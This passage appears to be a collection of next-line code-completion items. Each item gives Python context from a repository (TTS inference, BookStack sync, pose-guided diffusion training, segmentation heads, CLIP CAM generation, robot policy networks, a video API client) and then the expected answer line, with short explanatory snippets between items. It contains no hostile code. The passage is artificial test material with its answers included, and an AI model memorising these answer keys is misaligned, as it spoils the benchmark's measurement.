isinstance(response, Response): parsed_data = response.json() level = int(parsed_data["level"]) return level return 0 def get_gold() -> int: """ Get the current gold of your game. """ response = get_current_active_player_stats() if isinstance(response, Response): parsed_data = response.json() gold = int(parsed_data["currentGold"]) return gold return 0 def get_creepscore() -> str: """ Get the current creepScore of your live game creepScore is updated every 10cs by Riot. """ response = get_current_user_stats() if isinstance(response, Response): parsed_data = response.json() creep_score = str(parsed_data["creepScore"]) return f"{creep_score}cs" return "" def get_current_user_stats() -> Response | None: """ Request data from playerscores?summonerName and return the response. """
your_summoner_name = get_summoner_name()
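The wait_until_exists helper in this example is a retry loop around the local Riot API. Its core pattern, stripped of the game-specific branches, looks roughly like this (the function name and default constants are placeholders):

import time
import requests

def poll_until_ok(url, attempts=20, delay=5.0, timeout=30):
    # Keep retrying until the endpoint answers 200; give up after `attempts` tries.
    for _ in range(attempts):
        try:
            response = requests.get(url, timeout=timeout, verify=False)
            if response.status_code == 200:
                return response
        except requests.exceptions.ConnectionError:
            pass  # API not up yet, or the game has already ended
        time.sleep(delay)
    return None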
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: huahuahuage/Bert-VITS2-Speech # Path: log.py DISABLED_LOGGER = ["gradio.processing_utils", "gradio", "httpx"] # Path: config.py def read_config(config_path:str) -> dict: """ Read the config file """ f = open(config_path, "rb") try: raw_data:str = f.read() # Detect the config file encoding char_type = chardet.detect(raw_data)['encoding'] # Decode data = raw_data.decode(char_type) config_data = json.loads(data) except: config_data = {} logging.error(f"Config file {config_path} does not exist or is malformed.") f.close() return config_data # Path: config.py CONFIG_PATH = "config.json" def read_config(config_path:str) -> dict: def __init__(self) -> None: def get(self, key, default=None): class ONNX_CONFIG: # Path: onnx_infer/text/cleaner.py def clean_text(text: str, language: str): """ Normalize punctuation and convert the text into phonetic symbols for the corresponding language. norm_text: text after punctuation handling phones: list of phonetic symbols for the whole text tones: tones for the whole text word2ph: number of phonetic symbols per character """ try: language_text_normalize = getattr(text_normalize_instance, language) except AttributeError: raise TypeError(f"Invalid language type: {language}.") # Replace all Arabic numerals with the corresponding language's spoken form, and map symbols to the English symbols in the specified list norm_text = language_text_normalize(text) phones, tones, word2ph = getattr(g2p_instance, language)(norm_text) return norm_text, phones, tones, word2ph # Path: onnx_infer/text/cleaner.py def cleaned_text_to_sequence(cleaned_text, tones, language): """Converts a string of text to a sequence of IDs corresponding to the symbols in the text. Args: text: string to convert to a sequence Returns: List of integers corresponding to the symbols in the text """ phones = [symbol_to_id[symbol] for symbol in cleaned_text] tone_start = language_tone_start_map[language] tones = [i + tone_start for i in tones] lang_ids = [language_id_map[language]] * len(phones) return phones, tones, lang_ids # Path: onnx_infer/onnx_infer.py import os import numpy as np import onnxruntime as ort from copy import copy from typing import List from dataclasses import dataclass from log import log_instance from config import read_config from config import config_instance from .text.cleaner import clean_text, cleaned_text_to_sequence from .onnx_bert import get_bert BERT_ENABLE = config_instance.get("bert_enable", True) if BERT_ENABLE: # Get the Chinese speaker mark contained in the model CHINESE_CHARACTER_MARK = config_instance.get("onnx_tts_models_chinese_mark", "中文") ONNX_PROVIDERS = [config_instance.get("onnx_providers", "CPUExecutionProvider")] MODELS_PATH = os.path.abspath(config_instance.get("onnx_tts_models", "onnx/models")) MODELS_BASE_NAME = os.path.basename(MODELS_PATH) MODELS_PARENT_PATH = os.path.dirname(MODELS_PATH) MODELS_PREFIX = os.path.join(MODELS_PATH, os.path.basename(MODELS_PATH)) ONNX_MODELS_PATH = { "config": f"{MODELS_PARENT_PATH}/{MODELS_BASE_NAME}.json", "enc": f"{MODELS_PREFIX}_enc_p.onnx", "emb_g": f"{MODELS_PREFIX}_emb.onnx", "dp": f"{MODELS_PREFIX}_dp.onnx", "sdp": f"{MODELS_PREFIX}_sdp.onnx", "flow": f"{MODELS_PREFIX}_flow.onnx", "dec": f"{MODELS_PREFIX}_dec.onnx", } class SpeakerMap: """ Multilingual speaker mapping table """ def __init__(self) -> None: log_instance.info("Loading the model speakers' multilingual mapping table...")
self.map_data: dict = read_config("speakers_map.json")
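The read_config shown in this example defends against mixed encodings by sniffing the bytes before decoding. The same idea in isolation (a sketch, not the repo's exact error handling; the function name is illustrative):

import json
import chardet

def read_json_any_encoding(path):
    # Detect the encoding first so GBK- and UTF-8-encoded configs both load.
    with open(path, "rb") as f:
        raw = f.read()
    encoding = chardet.detect(raw)["encoding"] or "utf-8"
    return json.loads(raw.decode(encoding))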
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: jaypyles/obsidian-to-bookstack # Path: obsidian_to_bookstack/bookstack/artifacts.py class Book: def __init__( self, name: str, shelf: Shelf | None = None, client: Client | None = None, chapters: List = [], path: str = "", details: Dict = {}, from_client: bool = True, ) -> None: self.path = path self.name = name self.client = client self.shelf = shelf self.chapters = chapters self.details = details if from_client: self.pages = [] else: self._set_pages() def __str__(self) -> str: return self.name def _set_pages(self): pages = [] chapters = [] for item in os.listdir(self.path): item_path = os.path.join(self.path, item) if os.path.isdir(item_path): chapters.append( Chapter( path=os.path.join(self.path, item), name=item, client=self.client, shelf=self.shelf, book=self, from_client=False, ) ) else: if os.path.splitext(item)[1] == ".md": pages.append( Page( path=os.path.join(self.path, item), name=item, client=self.client, shelf=self.shelf, book=self, ) ) self.pages = pages self.chapters = chapters # Path: obsidian_to_bookstack/bookstack/artifacts.py class Shelf: def __init__( self, name: str, client: Client | None = None, from_client: bool = True, path: str = "", details: Dict = {}, ) -> None: self.path = path self.name = name self.client = client if from_client: self.books = [] else: self.books = self._set_books() self.client_books: list[dict] = [] self.details = details def __str__(self) -> str: return self.name def _set_books(self): books = [] for book in os.listdir(self.path): if os.path.isdir(os.path.join(self.path, book)) and not book.startswith( "." 
): b = Book( path=os.path.join(self.path, book), name=book, client=self.client, shelf=self, from_client=False, ) books.append(b) return books # Path: obsidian_to_bookstack/bookstack/client.py class RemoteClient(Client): @abstractmethod def __init__(self) -> None: super().__init__() self.id = os.getenv("BOOKSTACK_TOKEN_ID") self.secret = os.getenv("BOOKSTACK_TOKEN_SECRET") self.base_url = os.getenv("BOOKSTACK_BASE_URL") self.headers = {"Authorization": f"Token {self.id}:{self.secret}"} self.http = urllib3.PoolManager() def _make_request( self, request_type: RequestType, endpoint: BookstackAPIEndpoints | DetailedBookstackLink, body=None, json=None, ) -> urllib3.BaseHTTPResponse: """Make a HTTP request to a Bookstack API Endpoint""" assert self.base_url request_url = self.base_url + endpoint.value resp = self.http.request( request_type.value, request_url, headers=self.headers, body=body, json=json ) return resp def _get_from_client(self, endpoint: BookstackAPIEndpoints): """Make a GET request to a Bookstack API Endpoint""" resp = self._make_request(RequestType.GET, endpoint) assert resp data = json.loads(resp.data.decode()) return data["data"] # Path: obsidian_to_bookstack/bookstack/collectors/collector.py class RemoteCollector(BaseCollector): def __init__(self, verbose: bool, client: RemoteClient) -> None: super().__init__(verbose) self.client = client # Path: obsidian_to_bookstack/console.py # Path: obsidian_to_bookstack/utils.py def con_hash(key: str) -> int: """Get a consistent hash of a key""" hash_obj = hashlib.md5(key.encode()) hex_digest = hash_obj.hexdigest() return int(hex_digest, 16) # Path: obsidian_to_bookstack/bookstack/collectors/remote/RemoteBookCollector.py import json from typing import List from obsidian_to_bookstack.bookstack.artifacts import Book, Shelf from obsidian_to_bookstack.bookstack.client import RemoteClient from obsidian_to_bookstack.bookstack.collectors.collector import \ RemoteCollector from obsidian_to_bookstack.bookstack.constants import * from obsidian_to_bookstack.console import console from obsidian_to_bookstack.utils import con_hash class RemoteBookCollector(RemoteCollector): def __init__(self, verbose: bool, client: RemoteClient) -> None: super().__init__(verbose, client) def get_books(self, shelves: List[Shelf]): """Get remote books from shelves""" client_books = self.client._get_from_client(BookstackAPIEndpoints.BOOKS) for book in client_books: class DetailedBook(DetailedBookstackLink): LINK = f"/api/books/{book['id']}" details = json.loads( self.client._make_request( RequestType.GET, DetailedBook.LINK, ).data.decode() ) book["details"] = details books = [Book(book["name"], details=book["details"]) for book in client_books] BOOK_MAP = { con_hash(book.name + str(book.details["id"])): book for book in books } for shelf in shelves: for book in shelf.client_books: b = BOOK_MAP.get(con_hash(book["name"] + str(book["id"]))) if b: b.shelf = shelf shelf.books.append(b) if self.verbose:
console.log(f"Found remote book: {b}")
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: MingtaoGuo/AnimateAnyone_unofficial # Path: tutorial_dataset.py class MyDataset(Dataset): def __init__(self, path="/mnt/gmt/Dataset/"): self.path = path self.videos = os.listdir(path + "fashion_png") def __len__(self): return len(self.videos) * 10 def __getitem__(self, idx): video_name = np.random.choice(self.videos) frames = np.random.choice(os.listdir(self.path + "/fashion_png/" + video_name), [2]) ref_frame, tgt_frame = frames[0], frames[1] ref_bgr = cv2.imread(self.path + "/fashion_png/" + video_name + "/" + ref_frame) # ref_bgr = cv2.resize(ref_bgr, (256, 256)) ref_rgb = cv2.cvtColor(ref_bgr, cv2.COLOR_BGR2RGB) ref_rgb = (ref_rgb.astype(np.float32) / 127.5) - 1.0 tgt_bgr = cv2.imread(self.path + "/fashion_png/" + video_name + "/" + tgt_frame) # tgt_bgr = cv2.resize(tgt_bgr, (256, 256)) tgt_rgb = cv2.cvtColor(tgt_bgr, cv2.COLOR_BGR2RGB) tgt_rgb = (tgt_rgb.astype(np.float32) / 127.5) - 1.0 skt_bgr = cv2.imread(self.path + "/fashion_pose/" + video_name + "/" + tgt_frame) # skt_bgr = cv2.resize(skt_bgr, (256, 256)) skt_rgb = cv2.cvtColor(skt_bgr, cv2.COLOR_BGR2RGB) skt_rgb = skt_rgb.astype(np.float32) / 255.0 return dict(target=tgt_rgb, vision=ref_rgb, reference=ref_rgb, skeleton=skt_rgb) # Path: aldm/logger.py class ImageLogger(Callback): def __init__(self, batch_frequency=2000, max_images=4, clamp=True, increase_log_steps=True, rescale=True, disabled=False, log_on_batch_idx=False, log_first_step=False, log_images_kwargs=None): super().__init__() self.rescale = rescale self.batch_freq = batch_frequency self.max_images = max_images if not increase_log_steps: self.log_steps = [self.batch_freq] self.clamp = clamp self.disabled = disabled self.log_on_batch_idx = log_on_batch_idx self.log_images_kwargs = log_images_kwargs if log_images_kwargs else {} self.log_first_step = log_first_step @rank_zero_only def log_local(self, save_dir, split, images, global_step, current_epoch, batch_idx): root = os.path.join(save_dir, "image_log", split) for k in images: grid = torchvision.utils.make_grid(images[k], nrow=4) if self.rescale: grid = (grid + 1.0) / 2.0 # -1,1 -> 0,1; c,h,w grid = grid.transpose(0, 1).transpose(1, 2).squeeze(-1) grid = grid.numpy() grid = (grid * 255).astype(np.uint8) filename = "{}_gs-{:06}_e-{:06}_b-{:06}.png".format(k, global_step, current_epoch, batch_idx) path = os.path.join(root, filename) os.makedirs(os.path.split(path)[0], exist_ok=True) Image.fromarray(grid).save(path) def log_img(self, pl_module, batch, batch_idx, split="train"): check_idx = batch_idx # if self.log_on_batch_idx else pl_module.global_step if (self.check_frequency(check_idx) and # batch_idx % self.batch_freq == 0 hasattr(pl_module, "log_images") and callable(pl_module.log_images) and self.max_images > 0): logger = type(pl_module.logger) is_train = pl_module.training if is_train: pl_module.eval() with torch.no_grad(): images = pl_module.log_images(batch, split=split, **self.log_images_kwargs) for k in images: N = min(images[k].shape[0], self.max_images) images[k] = images[k][:N] if isinstance(images[k], torch.Tensor): images[k] = images[k].detach().cpu() if self.clamp: images[k] = torch.clamp(images[k], -1., 1.) 
self.log_local(pl_module.logger.save_dir, split, images, pl_module.global_step, pl_module.current_epoch, batch_idx) if is_train: pl_module.train() def check_frequency(self, check_idx): return check_idx % self.batch_freq == 0 def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx): if not self.disabled: self.log_img(pl_module, batch, batch_idx, split="train") # Path: aldm/model.py def create_model(config_path): config = OmegaConf.load(config_path) model = instantiate_from_config(config.model).cpu() print(f'Loaded model config from [{config_path}]') return model # Path: aldm/model.py def load_state_dict(ckpt_path, location='cpu'): _, extension = os.path.splitext(ckpt_path) if extension.lower() == ".safetensors": import safetensors.torch state_dict = safetensors.torch.load_file(ckpt_path, device=location) else: state_dict = get_state_dict(torch.load(ckpt_path, map_location=torch.device(location))) state_dict = get_state_dict(state_dict) print(f'Loaded state_dict from [{ckpt_path}]') return state_dict # Path: tutorial_train_animate.py from share import * from torch.utils.data import DataLoader from tutorial_dataset import MyDataset from aldm.logger import ImageLogger from aldm.model import create_model, load_state_dict import pytorch_lightning as pl # Configs resume_path = './models/reference_sd15_ini.ckpt' batch_size = 2 logger_freq = 300 learning_rate = 1e-5 # First use cpu to load models. Pytorch Lightning will automatically move it to GPUs. model = create_model('./models/aldm_v15.yaml').cpu() model.load_state_dict(load_state_dict(resume_path, location='cpu')) model.learning_rate = learning_rate # Misc
dataset = MyDataset()
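The ImageLogger in this example saves grids of images that arrive in [-1, 1]. The rescale path its log_local method applies can be sketched as follows; random tensors stand in for real model outputs:

import torch
import torchvision

images = torch.rand(4, 3, 64, 64) * 2 - 1             # pretend model outputs in [-1, 1]
grid = torchvision.utils.make_grid(images, nrow=4)    # (3, H, W) tile of the batch
grid = ((grid + 1.0) / 2.0).clamp(0, 1)               # -1,1 -> 0,1
array = (grid.permute(1, 2, 0).numpy() * 255).astype("uint8")  # HWC uint8, ready for PIL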
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: yasserben/CLOUDS # Path: clouds/modeling/transformer_decoder/clouds_transformer_decoder.py def build_transformer_decoder(cfg, in_channels, mask_classification=True): """ Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`. """ name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification) # Path: clouds/modeling/transformer_decoder/mask2former_transformer_decoder.py def build_original_transformer_decoder(cfg, in_channels, mask_classification=True): """ Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`. """ name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification) # Path: clouds/modeling/transformer_decoder/clouds_bis_transformer_decoder.py def build_bis_transformer_decoder(cfg, in_channels, mask_classification=True): """ Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`. """ name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification) # Path: clouds/modeling/pixel_decoder/msdeformattn.py def build_pixel_decoder(cfg, input_shape): """ Build a pixel decoder from `cfg.MODEL.ONE_FORMER.PIXEL_DECODER_NAME`. """ name = cfg.MODEL.SEM_SEG_HEAD.PIXEL_DECODER_NAME model = SEM_SEG_HEADS_REGISTRY.get(name)(cfg, input_shape) forward_features = getattr(model, "forward_features", None) if not callable(forward_features): raise ValueError( "Only SEM_SEG_HEADS with forward_features method can be used as pixel decoder. " f"Please implement forward_features for {name} to only return mask features." ) return model # Path: clouds/modeling/meta_arch/clouds_head.py import logging import fvcore.nn.weight_init as weight_init from copy import deepcopy from typing import Callable, Dict, List, Optional, Tuple, Union from torch import nn from torch.nn import functional as F from detectron2.config import configurable from detectron2.layers import Conv2d, ShapeSpec, get_norm from detectron2.modeling import SEM_SEG_HEADS_REGISTRY from ..transformer_decoder.clouds_transformer_decoder import build_transformer_decoder from ..transformer_decoder.mask2former_transformer_decoder import ( build_original_transformer_decoder, ) from ..transformer_decoder.clouds_bis_transformer_decoder import ( build_bis_transformer_decoder, ) from ..pixel_decoder.msdeformattn import build_pixel_decoder """ Copyright 2023 Telecom Paris, Yasser BENIGMIM. All rights reserved. Licensed under the Apache License, Version 2.0 Reference: https://github.com/facebookresearch/Mask2Former/blob/main/mask2former/modeling/meta_arch/mask_former_head.py """ @SEM_SEG_HEADS_REGISTRY.register() class CLOUDSHead(nn.Module): @configurable def __init__( self, input_shape: Dict[str, ShapeSpec], *, num_classes: int, pixel_decoder: nn.Module, loss_weight: float = 1.0, ignore_value: int = -1, # extra parameters transformer_predictor: nn.Module, transformer_in_feature: str, name_transformer_predictor: str, ): """ NOTE: this interface is experimental. 
Args: input_shape: shapes (channels and stride) of the input features num_classes: number of classes to predict pixel_decoder: the pixel decoder module loss_weight: loss weight ignore_value: category id to be ignored during training. transformer_predictor: the transformer decoder that makes prediction transformer_in_feature: input feature name to the transformer_predictor """ super().__init__() input_shape = sorted(input_shape.items(), key=lambda x: x[1].stride) self.in_features = [k for k, v in input_shape] feature_strides = [v.stride for k, v in input_shape] feature_channels = [v.channels for k, v in input_shape] self.ignore_value = ignore_value self.common_stride = 4 self.loss_weight = loss_weight self.pixel_decoder = pixel_decoder self.predictor = transformer_predictor self.transformer_in_feature = transformer_in_feature self.num_classes = num_classes self.name_transformer_predictor = name_transformer_predictor @classmethod def from_config(cls, cfg, input_shape: Dict[str, ShapeSpec]): # figure out in_channels to transformer predictor if cfg.MODEL.MASK_FORMER.TRANSFORMER_IN_FEATURE == "multi_scale_pixel_decoder": transformer_predictor_in_channels = cfg.MODEL.SEM_SEG_HEAD.CONVS_DIM else: raise NotImplementedError if ( cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME == "MultiScaleMaskedTransformerDecoder" ): return { "input_shape": { k: v for k, v in input_shape.items() if k in cfg.MODEL.SEM_SEG_HEAD.IN_FEATURES }, "ignore_value": cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE, "num_classes": cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,
"pixel_decoder": build_pixel_decoder(cfg, input_shape),
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: linyq2117/TagCLIP # Path: utils.py def scoremap2bbox(scoremap, threshold, multi_contour_eval=False): height, width = scoremap.shape scoremap_image = np.expand_dims((scoremap * 255).astype(np.uint8), 2) _, thr_gray_heatmap = cv2.threshold( src=scoremap_image, thresh=int(threshold * np.max(scoremap_image)), maxval=255, type=cv2.THRESH_BINARY) contours = cv2.findContours( image=thr_gray_heatmap, mode=cv2.RETR_EXTERNAL, method=cv2.CHAIN_APPROX_SIMPLE)[_CONTOUR_INDEX] if len(contours) == 0: return np.asarray([[0, 0, 0, 0]]), 1 if not multi_contour_eval: contours = [max(contours, key=cv2.contourArea)] estimated_boxes = [] for contour in contours: x, y, w, h = cv2.boundingRect(contour) x0, y0, x1, y1 = x, y, x + w, y + h x1 = min(x1, width - 1) y1 = min(y1, height - 1) estimated_boxes.append([x0, y0, x1, y1]) return np.asarray(estimated_boxes), len(contours) # Path: clip_text.py BACKGROUND_CATEGORY_VOC = ['ground','land','grass','tree','building','wall','sky','lake','water','river','sea','railway','railroad','keyboard','helmet', 'cloud','house','mountain','ocean','road','rock','street','valley','bridge','sign', ] BACKGROUND_CATEGORY_COCO = ['ground','land','grass','tree','building','wall','sky','lake','water','river','sea','railway','railroad','helmet', 'cloud','house','mountain','ocean','road','rock','street','valley','bridge', ] # Path: CLIP-ES/generate_cams_coco.py from pytorch_grad_cam import GradCAM from PIL import Image from tqdm import tqdm from pytorch_grad_cam.utils.image import scale_cam_image from utils import scoremap2bbox from clip_text import class_names, new_class_names_coco, BACKGROUND_CATEGORY_COCO from torch import multiprocessing from torchvision.transforms import Compose, Resize, CenterCrop, ToTensor, Normalize, RandomHorizontalFlip from torchvision.transforms import InterpolationMode import torch import clip import numpy as np import cv2 import os import argparse import warnings # -*- coding:UTF-8 -*- try: BICUBIC = InterpolationMode.BICUBIC except ImportError: BICUBIC = Image.BICUBIC warnings.filterwarnings("ignore") _CONTOUR_INDEX = 1 if cv2.__version__.split('.')[0] == '3' else 0 def reshape_transform(tensor, height=28, width=28): tensor = tensor.permute(1, 0, 2) result = tensor[:, 1:, :].reshape(tensor.size(0), height, width, tensor.size(2)) # Bring the channels to the first dimension, # like in CNNs. 
result = result.transpose(2, 3).transpose(1, 2) return result def split_dataset(dataset, all_label_list, n_splits): if n_splits == 1: return [dataset], [all_label_list] part = len(dataset) // n_splits dataset_list = [] split_label_list = [] for i in range(n_splits - 1): dataset_list.append(dataset[i*part:(i+1)*part]) split_label_list.append(all_label_list[i*part:(i+1)*part]) dataset_list.append(dataset[(i+1)*part:]) split_label_list.append(all_label_list[(i+1)*part:]) return dataset_list, split_label_list def zeroshot_classifier(classnames, templates, model): with torch.no_grad(): zeroshot_weights = [] for classname in classnames: texts = [template.format(classname) for template in templates] #format with class texts = clip.tokenize(texts).to(device) #tokenize class_embeddings = model.encode_text(texts) #embed with text encoder class_embeddings /= class_embeddings.norm(dim=-1, keepdim=True) class_embedding = class_embeddings.mean(dim=0) class_embedding /= class_embedding.norm() zeroshot_weights.append(class_embedding) zeroshot_weights = torch.stack(zeroshot_weights, dim=1).to(device) return zeroshot_weights.t() class ClipOutputTarget: def __init__(self, category): self.category = category def __call__(self, model_output): if len(model_output.shape) == 1: return model_output[self.category] return model_output[:, self.category] def _convert_image_to_rgb(image): return image.convert("RGB") def _transform_resize(h, w): return Compose([ Resize((h,w), interpolation=BICUBIC), _convert_image_to_rgb, ToTensor(), Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711)), ]) def img_ms_and_flip(img_path, ori_height, ori_width, scales=[1.0], patch_size=16): all_imgs = [] for scale in scales: preprocess = _transform_resize(int(np.ceil(scale * int(ori_height) / patch_size) * patch_size), int(np.ceil(scale * int(ori_width) / patch_size) * patch_size)) image = preprocess(Image.open(img_path)) image_ori = image image_flip = torch.flip(image, [-1]) all_imgs.append(image_ori) all_imgs.append(image_flip) return all_imgs def perform(process_id, dataset_list, args, model, bg_text_features, fg_text_features, cam, split_label_list): n_gpus = torch.cuda.device_count() device_id = "cuda:{}".format(process_id % n_gpus) databin = dataset_list[process_id] all_label_list = split_label_list[process_id] model = model.to(device_id) bg_text_features = bg_text_features.to(device_id) fg_text_features = fg_text_features.to(device_id) for im_idx, im in enumerate(tqdm(databin)): img_path = os.path.join(args.img_root, im) ori_image = Image.open(img_path) ori_height, ori_width = np.asarray(ori_image).shape[:2] label_id_list = all_label_list[im_idx] label_list = [] for lid in label_id_list:
label_list.append(new_class_names_coco[int(lid)])
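The reshape_transform in this example converts ViT token sequences into CNN-style feature maps so GradCAM can treat them spatially. An equivalent version using a single permute instead of two transposes, with a shape check (the 28 x 28 patch grid matches the source's defaults):

import torch

def reshape_tokens(tokens, height=28, width=28):
    # (seq, batch, dim) -> drop the CLS token, fold patches back into a 2D grid
    tokens = tokens.permute(1, 0, 2)                       # (batch, seq, dim)
    grid = tokens[:, 1:, :].reshape(tokens.size(0), height, width, tokens.size(2))
    return grid.permute(0, 3, 1, 2)                        # (batch, dim, H, W)

tokens = torch.randn(1 + 28 * 28, 2, 512)                  # CLS token + 784 patch tokens
assert reshape_tokens(tokens).shape == (2, 512, 28, 28)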
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: cypypccpy/dynamic_handover # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py POLICYNETWORKS = Registry('policy_network') # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py def build_backbone(cfg): return build(cfg, BACKBONES) # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py def build_dense_head(cfg): return build(cfg, DENSEHEADS) # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/utils.py def replace_placeholder_with_args(parameters, **kwargs): if isinstance(parameters, ConfigDict): for key, v in parameters.items(): parameters[key] = replace_placeholder_with_args(v, **kwargs) return parameters elif isinstance(parameters, (tuple, list)): type_of_parameters = type(parameters) parameters = list(parameters) for i, parameter in enumerate(parameters): parameters[i] = replace_placeholder_with_args(parameter, **kwargs) return type_of_parameters(parameters) elif isinstance(parameters, Number): return parameters elif isinstance(parameters, str): for key in kwargs: if key in parameters: parameters = parameters.replace(key, str(kwargs[key])) try: return eval(parameters) except: return parameters elif parameters is None: return None else: print(f'Strange type!! {parameters}, type of parameters {type(parameters)}') # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/utils.py def get_kwargs_from_shape(obs_shape, action_shape): replaceable_kwargs = {} if action_shape is not None: replaceable_kwargs['action_shape'] = action_shape if isinstance(obs_shape, dict): if 'pointcloud' in obs_shape.keys(): # For mani_skill point cloud input replaceable_kwargs['pcd_all_channel'] = ( obs_shape['pointcloud']['xyz'][-1] + obs_shape['pointcloud']['rgb'][-1] + obs_shape['pointcloud']['seg'][-1] ) replaceable_kwargs['num_objs'] = obs_shape['pointcloud']['seg'][-1] replaceable_kwargs['pcd_xyz_rgb_channel'] = ( obs_shape['pointcloud']['xyz'][-1] + obs_shape['pointcloud']['rgb'][-1] ) if 'rgbd' in obs_shape.keys(): # For mani_skill point rgbd input mode = list(obs_shape['rgbd'].keys())[0] # image format is H, W, C replaceable_kwargs['rgbd_channel'] = ( obs_shape['rgbd'][mode]['rgb'][-1] + obs_shape['rgbd'][mode]['depth'][-1] + obs_shape['rgbd'][mode]['seg'][-1] ) replaceable_kwargs['agent_shape'] = obs_shape['state'] else: replaceable_kwargs['obs_shape'] = obs_shape return replaceable_kwargs # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/policy_network/vae_policy.py from algorithms.utils.mani_skill_learn.utils.data import to_torch from algorithms.utils.mani_skill_learn.utils.torch import ExtendedModule from ..builder import POLICYNETWORKS, build_backbone, build_dense_head from ..utils import replace_placeholder_with_args, get_kwargs_from_shape @POLICYNETWORKS.register_module() class VAEPolicy(ExtendedModule): def __init__(self, nn_cfg, policy_head_cfg, action_space, obs_shape=None, action_shape=None): super(VAEPolicy, self).__init__() replaceable_kwargs = get_kwargs_from_shape(obs_shape, action_shape)
nn_cfg = replace_placeholder_with_args(nn_cfg, **replaceable_kwargs)
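replace_placeholder_with_args lets config files reference shapes symbolically ('obs_shape + action_shape') and resolves them at build time. A compact sketch of that substitute-then-eval walk, simplified relative to the ConfigDict-aware version in this example:

def fill_placeholders(cfg, **values):
    # Recursively substitute placeholder names in strings, then try to evaluate.
    if isinstance(cfg, dict):
        return {k: fill_placeholders(v, **values) for k, v in cfg.items()}
    if isinstance(cfg, (list, tuple)):
        return type(cfg)(fill_placeholders(v, **values) for v in cfg)
    if isinstance(cfg, str):
        for key, value in values.items():
            cfg = cfg.replace(key, str(value))
        try:
            return eval(cfg)        # "17 + 6" -> 23
        except Exception:
            return cfg              # plain strings pass through unchanged
    return cfg

cfg = {"mlp_spec": ["obs_shape + action_shape", 256, "action_shape"]}
assert fill_placeholders(cfg, obs_shape=17, action_shape=6) == {"mlp_spec": [23, 256, 6]}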
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: video-db/videodb-python # Path: videodb/_utils/_video.py def play_stream(url: str): """Play a stream url in the browser/ notebook :param str url: The url of the stream :return: The player url if the stream is opened in the browser or the iframe if the stream is opened in the notebook """ player = f"{PLAYER_URL}?url={url}" opend = web.open(player) if not opend: try: from IPython.display import IFrame player_width = 800 player_height = 400 return IFrame(player, player_width, player_height) except ImportError: return player return player # Path: videodb/_constants.py class SearchType: semantic = "semantic" # Path: videodb/_constants.py class ApiPath: collection = "collection" upload = "upload" video = "video" stream = "stream" thumbnail = "thumbnail" upload_url = "upload_url" transcription = "transcription" index = "index" search = "search" compile = "compile" workflow = "workflow" # Path: videodb/_constants.py class SemanticSearchDefaultValues: result_threshold = 5 score_threshold = 0.2 # Path: videodb/exceptions.py class SearchError(VideodbError): """ Raised when a search is invalid. """ def __init__(self, message): super(SearchError, self).__init__(message) # Path: videodb/shot.py class Shot: """A shot is a part of a video that contains a specific scene""" def __init__( self, _connection, video_id: str, video_length: float, video_title: str, start: float, end: float, text: Optional[str] = None, search_score: Optional[int] = None, ) -> None: self._connection = _connection self.video_id = video_id self.video_length = video_length self.video_title = video_title self.start = start self.end = end self.text = text self.search_score = search_score self.stream_url = None self.player_url = None def __repr__(self) -> str: return ( f"Shot(" f"video_id={self.video_id}, " f"video_title={self.video_title}, " f"start={self.start}, " f"end={self.end}, " f"text={self.text}, " f"search_score={self.search_score}, " f"stream_url={self.stream_url}, " f"player_url={self.player_url})" ) def __getitem__(self, key): """Get an item from the shot object""" return self.__dict__[key] def generate_stream(self) -> str: """Generate a stream url for the shot :return: The stream url :rtype: str """ if self.stream_url: return self.stream_url else: stream_data = self._connection.post( path=f"{ApiPath.video}/{self.video_id}/{ApiPath.stream}", data={ "timeline": [(self.start, self.end)], "length": self.video_length, }, ) self.stream_url = stream_data.get("stream_url") self.player_url = stream_data.get("player_url") return self.stream_url def play(self) -> str: """Generate a stream url for the shot and open it in the default browser/ notebook :return: The stream url :rtype: str """ self.generate_stream() return play_stream(self.stream_url) # Path: videodb/search.py from abc import ABC, abstractmethod from videodb._utils._video import play_stream from videodb._constants import ( SearchType, ApiPath, SemanticSearchDefaultValues, ) from videodb.exceptions import ( SearchError, ) from typing import Optional, List from videodb.shot import Shot class 